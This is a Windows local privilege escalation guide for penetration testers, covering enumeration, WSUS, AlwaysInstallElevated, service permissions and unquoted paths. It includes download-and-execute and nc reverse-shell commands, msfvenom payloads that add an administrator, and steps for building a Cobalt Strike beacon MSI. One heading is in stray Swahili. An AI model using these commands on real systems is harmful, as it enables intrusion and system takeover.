Windows Local Privilege Escalation


The best tool to look for Windows local privilege escalation vectors: WinPEAS

Initial Windows Theory

Access Tokens

If you don't know what Windows Access Tokens are, read the following page before continuing:

Access Tokens

ACLs - DACLs/SACLs/ACEs

Check the following page for more information about ACLs - DACLs/SACLs/ACEs:

ACLs - DACLs/SACLs/ACEs

Integrity Levels

If you don't know what integrity levels are in Windows, you should read the following page before continuing:

Integrity Levels

Windows Security Controls

There are several things in Windows that can stop you from enumerating the system, running executables, or even detect your activity. You should read the following page and enumerate all of these defence mechanisms before starting the privilege escalation enumeration:

Windows Security Controls

Admin Protection / UIAccess silent elevation

UIAccess processes launched through RAiLaunchAdminProcess can be abused to reach High IL without a prompt once the AppInfo secure-path checks pass. See the specific UIAccess/Admin Protection bypass workflow here:

Uiaccess Admin Protection Bypass

Secure Desktop accessibility registry propagation can be abused for an arbitrary SYSTEM registry write (RegPwn):

Secure Desktop Accessibility Registry Propagation LPE (RegPwn)

System Info

Version info enumeration

Check whether the Windows version has any known vulnerability (also check which patches are applied).

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Version Exploits

This site is handy for looking up detailed information about Microsoft security vulnerabilities. The database holds more than 4,700 security vulnerabilities, which illustrates the massive attack surface a Windows environment exposes.

On the system

  • post/windows/gather/enum_patches
  • post/multi/recon/local_exploit_suggester
  • watson
  • winpeas (Winpeas has watson embedded)

Locally with system information

Github repos of exploits:

Environment

Is there any credential or other juicy information stored in environment variables?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

PowerShell history

ConsoleHost_history #Find the PATH where it is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PowerShell Transcript files

You can learn how to turn this on at https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check if it is enabled in the registry (EnableTranscripting = 1; OutputDirectory gives the transcript folder)
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Software\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

Details of PowerShell pipeline executions are recorded, including the executed commands, command invocations, and parts of scripts. Full execution details and output results may not be captured, however.

To enable it, follow the instructions in the "Transcript files" section of the documentation, choosing "Module Logging" instead of "PowerShell Transcription".

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Software\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging

To view the last 15 events from the PowerShell logs you can run:

Get-WinEvent -LogName "Windows PowerShell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

A complete activity and full-content record of script execution is captured, ensuring that every block of code is logged as it runs. This preserves a comprehensive audit trail of each activity, valuable for forensics and for analysing malicious behaviour, and gives detailed insight into the process at execution time.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Software\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Script Block logging events can be found in the Windows Event Viewer under: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
To view the last 20 events you can use:

Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | select -First 20 | Out-GridView
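The three logging checks above can be run in one go. The following is an added example, not code from the original page: it reads the documented policy values (EnableTranscripting, OutputDirectory, EnableModuleLogging, EnableScriptBlockLogging) from both hives and reports what will be recorded before you do anything noisy. The function names are my own.

```powershell
# Added example (not from the original page): summarise which PowerShell logging features are
# enabled by policy so you know what your own activity will leave behind.
# Value names are the documented policy values; a $null result means "not configured".
function Get-PowerShellLoggingState {
    $base = 'Software\Policies\Microsoft\Windows\PowerShell'
    $checks = @(
        @{ Feature = 'Transcription';      Key = "$base\Transcription";      Value = 'EnableTranscripting' },
        @{ Feature = 'ModuleLogging';      Key = "$base\ModuleLogging";      Value = 'EnableModuleLogging' },
        @{ Feature = 'ScriptBlockLogging'; Key = "$base\ScriptBlockLogging"; Value = 'EnableScriptBlockLogging' }
    )
    foreach ($c in $checks) {
        foreach ($hive in 'HKLM', 'HKCU') {
            $path = "${hive}:\$($c.Key)"
            $item = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue
            $valueName = $c.Value
            $enabled = $null
            if ($item -and $null -ne $item.$valueName) { $enabled = ([int]$item.$valueName -eq 1) }
            # Transcripts are written to OutputDirectory (if set) or to the user's Documents folder
            $extra = ''
            if ($c.Feature -eq 'Transcription' -and $item) { $extra = [string]$item.OutputDirectory }
            [pscustomobject]@{
                Feature = $c.Feature
                Hive    = $hive
                Enabled = $enabled
                Detail  = $extra
            }
        }
    }
}

# Location of the PSReadLine history file that may already contain earlier commands
function Get-PowerShellHistoryPath {
    try { (Get-PSReadlineOption).HistorySavePath } catch { $null }
}

Get-PowerShellLoggingState | Format-Table -AutoSize
Get-PowerShellHistoryPath
```

Machine policy (HKLM) takes precedence over the user hive, so if HKLM reports Enabled for ScriptBlockLogging, assume every script block you run lands in Microsoft-Windows-PowerShell/Operational (event 4104).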

Internet Settings

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Drives

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

You can compromise the system if updates are not requested over HTTPS but over plain HTTP.

Start by checking whether the network uses a non-SSL WSUS update server by running the following in cmd:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Or the following in PowerShell:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

If you get a reply such as one of these:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" equals 1.

Then it is exploitable. If that last value equals 0, the WSUS entry is ignored.

To exploit this you can use tools such as Wsuxploit or pyWSUS. These are weaponised MiTM exploit scripts that inject 'fake' updates into non-SSL WSUS traffic.

Read the research here:

WSUS CVE-2020-1013

Read the complete report here.
In short, this is the flaw the bug exploits:

If we have the ability to modify our local user proxy, and Windows Update uses the proxy configured in Internet Explorer's settings, we therefore have the ability to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.

Furthermore, since the WSUS service uses the current user's settings, it will also use the current user's certificate store. If we generate a self-signed certificate for the WSUS hostname and add it to the current user's certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanism to implement trust-on-first-use validation of the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.

You can exploit this vulnerability using the tool WSUSpicious (once it is released).
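The checks above (plain-HTTP WUServer, UseWUServer, and, for the CVE-2020-1013 variant, the current user's proxy settings) combined into one function. This is an added example, not code from the original page or from the referenced research; the function name is my own, and the registry paths are the ones quoted above plus the HKCU Internet Settings key used by WinINET.

```powershell
# Added example (not from the original page): report whether the WSUS conditions described above
# are met. Exploitable in the classic MitM sense when WUServer is http:// and UseWUServer is 1;
# the user proxy values are shown because the CVE-2020-1013 variant relies on them being honoured.
function Get-WsusExposure {
    $wu = Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate' -ErrorAction SilentlyContinue
    $au = Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU' -ErrorAction SilentlyContinue
    $ie = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -ErrorAction SilentlyContinue

    $server    = [string]$wu.WUServer
    $useServer = 0
    if ($null -ne $au.UseWUServer) { $useServer = [int]$au.UseWUServer }
    $plainHttp = ($server -ne '') -and ($server -match '^http://')

    [pscustomobject]@{
        WUServer        = $server
        UseWUServer     = $useServer
        PlainHttpWsus   = ($plainHttp -and $useServer -eq 1)   # non-SSL WSUS actually in use
        UserProxyEnable = [int]$ie.ProxyEnable                  # 1 = a WinINET proxy is set for this user
        UserProxyServer = [string]$ie.ProxyServer
    }
}

Get-WsusExposure | Format-List
```

If WUServer is https:// the plain MitM path is closed, but the report above still tells you whether a user-writable proxy is in play, which is the precondition for the local-interception variant.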

Third-Party Auto-Updaters and Agent IPC (local privesc)

Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker-controlled server and the updater trusts a rogue root CA or performs weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See the generalised technique (based on the Netskope stAgentSvc chain, CVE-2025-0309) here:

Abusing Auto Updaters And Ipc

Veeam Backup & Replication CVE-2023-27532 (SYSTEM via TCP 9401)

Veeam B&R < 11.0.1.1261 exposes a localhost service on TCP/9401 that processes attacker-controlled messages, allowing arbitrary commands to run as NT AUTHORITY\SYSTEM.

  • Recon: confirm the listener and the version, e.g. netstat -ano | findstr 9401 and (Get-Item "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Shell.exe").VersionInfo.FileVersion.
  • Exploit: drop a PoC such as VeeamHax.exe together with the required Veeam DLLs in the same directory, then trigger the SYSTEM payload over the local socket:
.\VeeamHax.exe --cmd "powershell -ep bypass -c \"iex(iwr http://attacker/shell.ps1 -usebasicparsing)\""

The service executes the command as SYSTEM.

KrbRelayUp

A local privilege escalation vulnerability exists in Windows domain environments under specific conditions: LDAP signing is not enforced, users hold self-rights that allow them to configure Resource-Based Constrained Delegation (RBCD), and users are allowed to create computer accounts in the domain. Note that these requirements are met with default settings.

Find the exploit at https://github.com/Dec0ne/KrbRelayUp

For more information about the attack flow see https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

If these 2 registry values are enabled (value 0x1), users of any privilege level can install (execute) *.msi files as NT AUTHORITY\SYSTEM. Both values must be set; a single one is not enough.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

If you have a meterpreter session you can automate this technique using the module exploit/windows/local/always_install_elevated

PowerUP

Use the Write-UserAddMSI command from PowerUp to create, in the current directory, a Windows MSI binary that escalates privileges. The script writes out a precompiled MSI installer that prompts for a user/group to add (so you need GUI access):

Write-UserAddMSI

Just execute the created binary to escalate privileges.

MSI Wrapper

Read this tutorial to learn how to create an MSI wrapper with these tools. Note that you can wrap a ".bat" file if you only want to run command lines

MSI Wrapper

Create MSI with WIX

Create MSI with WIX

Create MSI with Visual Studio

  • Generate a new Windows EXE TCP payload with Cobalt Strike or Metasploit at C:\privesc\beacon.exe
  • Open Visual Studio, select Create a new project and type "installer" into the search box. Select the Setup Wizard project and click Next.
  • Give the project a name, such as AlwaysPrivesc, use C:\privesc as the location, select place solution and project in the same directory, and click Create.
  • Keep clicking Next until you reach step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.
  • Highlight the AlwaysPrivesc project in Solution Explorer and in Properties change TargetPlatform from x86 to x64.
  • There are other properties you can change, such as Author and Manufacturer, which can make the installed app look more legitimate.
  • Right-click the project and select View > Custom Actions.
  • Right-click Install and select Add Custom Action.
  • Double-click Application Folder, select your beacon.exe file and click OK. This ensures the beacon payload is executed as soon as the installer runs.
  • Under Custom Action Properties, change Run64Bit to True.
  • Finally, build it.
  • If the warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' appears, make sure you set the platform to x64.

MSI Installation

To run the installation of the malicious .msi file in the background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

To exploit this vulnerability you can use: exploit/windows/local/always_install_elevated

Antivirus and Detectors

Audit Settings

These settings determine what gets logged, so you should pay attention to them

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding: it is useful to know where the logs are being sent

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS is designed to manage local Administrator passwords, ensuring that each password is unique, randomised, and regularly rotated on domain-joined computers. The passwords are stored in Active Directory and can only be read by users granted sufficient permissions through ACLs, allowing them to view local admin passwords if authorised.

LAPS

WDigest

If it is active, plain-text passwords are kept in LSASS (Local Security Authority Subsystem Service). UseLogonCredential = 1 means WDigest caches plaintext credentials; 0 or absent means it does not.
More information about WDigest on this page.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

Ulinzi wa LSA

Starting with Windows 8.1, Microsoft introduced enhanced protection for the Local Security Authority (LSA) to block attempts by untrusted processes to read its memory or inject code, further hardening the system. RunAsPPL = 1 means LSASS runs as a protected process light (PPL).
More information about LSA Protection here.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard was introduced in Windows 10. Its purpose is to protect the credentials stored on a device against threats such as pass-the-hash attacks. LsaCfgFlags = 1 means enabled with UEFI lock, 2 means enabled without lock, 0 means disabled. More information about Credential Guard here.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

Domain credentials are authenticated by the Local Security Authority (LSA) and used by operating system components. When a user's logon data is authenticated by a registered security package, domain credentials for the user are typically established. The value below is the number of logons cached locally (default 10).
More information about Cached Credentials here.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Users & Groups

Enumerate Users & Groups

You should check whether any of the groups you belong to have interesting permissions

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Privileged groups

If you belong to a privileged group you may be able to escalate privileges. Learn about privileged groups and how to abuse them to escalate privileges here:

Privileged Groups

Token manipulation

Learn more about what a token is on this page: Windows Tokens.
Check the following page to learn about interesting tokens and how to abuse them:

Abusing Tokens

Logged-on users / Sessions

qwinsta
klist sessions

Home folders

dir C:\Users
Get-ChildItem C:\Users

Password Policy

net accounts

Get the content of the clipboard

powershell -command "Get-Clipboard"

Running Processes

File and Folder Permissions

First of all, when listing processes check for passwords inside the command line of each process.
Check whether you can overwrite a running binary or whether you have write permissions on the binary's folder, to exploit possible DLL Hijacking attacks:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Always check for electron/cef/chromium debuggers running; you can abuse them to escalate privileges.

Checking permissions of the process binaries

REM Batch-file syntax (%%x); use a single % for each variable when typing this interactively
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Checking permissions of the folders of the process binaries (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)

Password extraction from memory

You can create a memory dump of a running process with procdump from Sysinternals. Services such as FTP keep credentials in clear text in memory; try dumping the memory and reading the credentials.

procdump.exe -accepteula -ma <proc_name_tasklist>

Insecure GUI apps

Applications running as SYSTEM may let a user spawn a CMD or browse directories.

Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click "Click to open Command Prompt"

Services

Service Triggers let Windows start a service when certain conditions occur (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, etc.). Even without SERVICE_START rights you can often start privileged services by firing their triggers. See enumeration and activation techniques here:

Service Triggers

Get a list of services:

net start
wmic service list brief
sc query
Get-Service

Permissions

You can use sc to get information about a service

sc qc <service_name>

It is recommended to have the accesschk binary from Sysinternals to check the privilege level required for each service.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

It is recommended to check whether "Authenticated Users" can modify any service:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

You can download accesschk.exe for XP from here

Enable service

If you get this error (for example with SSDPSRV):

System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

You can enable it using

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Take into account that the service upnphost depends on SSDPSRV to work (on XP SP1)

Another workaround for this problem is running:

sc.exe config usosvc start= auto

Modify the service binary path

If the "Authenticated users" group has SERVICE_ALL_ACCESS on a service, the service's executable binary can be modified. To modify and run it with sc:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Restart the service

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Privileges can be escalated through several of the service permissions:

  • SERVICE_CHANGE_CONFIG: allows reconfiguring the service binary.
  • WRITE_DAC: allows reconfiguring permissions, which in turn gives the ability to change service configurations.
  • WRITE_OWNER: allows taking ownership and then reconfiguring permissions.
  • GENERIC_WRITE: includes the ability to change service configurations.
  • GENERIC_ALL: also includes the ability to change service configurations.

For detection and exploitation of this vulnerability, exploit/windows/local/service_permissions can be used.
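The rights listed above can be checked for every service without accesschk, using the service security descriptor that sc sdshow prints. The following is an added example, not code from the original page: it parses each SDDL with .NET, keeps only allow ACEs whose SID is in the current user's token, and flags the dangerous bits. The access-mask constants are the documented service and standard rights; the function names are my own.

```powershell
# Added example (not from the original page): find services whose DACL grants one of the
# current user's SIDs a right that allows reconfiguring the service.
$ServiceRights = @{
    SERVICE_CHANGE_CONFIG = 0x00000002
    SERVICE_START         = 0x00000010
    SERVICE_STOP          = 0x00000020
    WRITE_DAC             = 0x00040000
    WRITE_OWNER           = 0x00080000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
}
# Any of these lets you change the binary path, directly or after rewriting the DACL/owner
$DangerousMask = 0x00000002 -bor 0x00040000 -bor 0x00080000 -bor 0x10000000 -bor 0x40000000

function Get-CurrentUserSids {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Get-ServiceDaclFindings {
    param([string[]]$Name = (Get-Service | Select-Object -ExpandProperty Name))
    $mySids = Get-CurrentUserSids
    foreach ($svc in $Name) {
        # sc sdshow prints a blank line followed by the SDDL string (D:...S:...)
        $sddl = (& sc.exe sdshow "$svc" 2>$null | ForEach-Object { $_.Trim() } | Where-Object { $_ -like 'D:*' }) -join ''
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            if ($mySids -notcontains $ace.SecurityIdentifier.Value) { continue }
            if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }
            $names = $ServiceRights.GetEnumerator() |
                Where-Object { ($ace.AccessMask -band $_.Value) -ne 0 } |
                ForEach-Object { $_.Key } | Sort-Object
            $who = $ace.SecurityIdentifier.Value
            try { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch {}
            [pscustomobject]@{
                Service  = $svc
                Identity = $who
                Rights   = ($names -join ',')
                Mask     = ('0x{0:X8}' -f $ace.AccessMask)
            }
        }
    }
}

Get-ServiceDaclFindings | Format-Table -AutoSize
```

A hit that also carries SERVICE_START (or a service that is already running and can be stopped) is the one to use: change binpath= as shown above, then start or restart it. Deny ACEs are ignored here, so confirm a finding with sc config before relying on it.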

Services binaries weak permissions

Check whether you can modify the binary executed by a service, or whether you have write permissions on the folder where the binary lives (DLL Hijacking).
You can obtain every binary executed by a service with wmic (excluding system32) and check your permissions with icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

You can also use sc and icacls:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Services registry modify permissions

You should check whether you can modify any service's registry key.
You can check your permissions over a service registry key with:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service key with its current content (to check if you have write permissions).
#Caveat: reg save/reg restore need SeBackupPrivilege/SeRestorePrivilege, so from an unprivileged shell this loop may report nothing; the get-acl check below does not have that limitation
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Check whether Authenticated Users or NT AUTHORITY\INTERACTIVE have FullControl. If so, the binary executed by the service can be changed.

To change the path of the executed binary:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Some Windows Accessibility features create per-user ATConfig keys that a SYSTEM process later copies into a per-session HKLM key. A registry symbolic-link race can redirect that privileged write to an arbitrary HKLM path, giving you an arbitrary HKLM value write primitive.

Key locations (example: On-Screen Keyboard osk):

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs lists the installed accessibility features.
  • HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\<feature> holds the user-controlled configuration.
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session<session id>\ATConfig\<feature> is created during logon/secure-desktop transitions and is writable by the user.

Abuse flow (CVE-2026-24291 / ATConfig):

  1. Populate the HKCU ATConfig value you want SYSTEM to write.
  2. Trigger the secure-desktop copy (for example, LockWorkstation), which starts the AT broker flow.
  3. Win the race by placing an oplock on C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu.xml; when the oplock fires, replace the HKLM Session ATConfig key with a registry link pointing to the protected HKLM target.
  4. SYSTEM writes the attacker-chosen value to the redirected HKLM path.

Once you have an arbitrary HKLM value write, turn it into LPE by overwriting service configuration values:

  • HKLM\SYSTEM\CurrentControlSet\Services\<svc>\ImagePath (EXE/command line)
  • HKLM\SYSTEM\CurrentControlSet\Services\<svc>\Parameters\ServiceDll (DLL)

Pick a service a standard user can start (for example, msiserver) and trigger it after the write. Note: the public exploit implementation locks the workstation as part of the race.

Example tooling (RegPwn BOF / standalone):

beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
net start msiserver

Services registry AppendData/AddSubdirectory permissions

If you have this permission over a registry key, you can create subkeys under it. In the case of Windows services this is enough to execute arbitrary code:

AppendData/AddSubdirectory permission over service registry

Unquoted Service Paths

If the path to an executable is not enclosed in quotes, Windows tries to execute every prefix that ends before a space.

For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

List all unquoted service paths, excluding those that belong to built-in Windows services:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v """"
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\system32" | findstr /i /v """"  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:"\""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

You can detect and exploit this vulnerability with metasploit: exploit/windows/local/trusted_service_path. You can also create the service binary manually with metasploit:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
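The candidate-path rule illustrated with C:\Program.exe above, implemented for every service and paired with a writability test. This is an added example, not code from the original page or from PowerUp: it derives the intermediate paths, stops once a prefix resolves to the real binary (so arguments after the executable are not expanded), and probes each candidate directory by creating and deleting a zero-byte file. The function names are my own.

```powershell
# Added example (not from the original page): unquoted service path candidates plus a real
# writability probe for each candidate's directory.
function Get-UnquotedPathCandidates {
    param([string]$PathName)
    if (-not $PathName -or $PathName.StartsWith('"') -or $PathName -notmatch ' ') { return @() }
    $parts = $PathName -split ' '
    $out = @()
    for ($i = 0; $i -lt $parts.Count - 1; $i++) {
        $prefix = $parts[0..$i] -join ' '
        # Once a prefix resolves to an existing file we have reached the real binary;
        # everything after it is an argument, so stop expanding.
        if ((Test-Path -LiteralPath $prefix -PathType Leaf) -or
            (Test-Path -LiteralPath "$prefix.exe" -PathType Leaf)) { break }
        $out += "$prefix.exe"
    }
    return $out
}

function Test-DirectoryWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    # Exact but noisy: creates and removes a hidden-looking zero-byte file in the directory
    $probe = Join-Path $Dir ('.' + [guid]::NewGuid().ToString('N'))
    try {
        [IO.File]::Create($probe).Dispose()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Find-UnquotedServicePaths {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
            [pscustomobject]@{
                Service     = $svc.Name
                StartMode   = $svc.StartMode
                RunsAs      = $svc.StartName
                Candidate   = $cand
                DirWritable = Test-DirectoryWritable (Split-Path -Parent $cand)
            }
        }
    }
}

Find-UnquotedServicePaths | Where-Object DirWritable | Format-Table -AutoSize
```

A writable candidate only pays off if you can also get the service to (re)start: check StartMode (Auto means a reboot is enough) and the service DACL for SERVICE_START/SERVICE_STOP before planting the exe-service payload.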

Recovery Actions

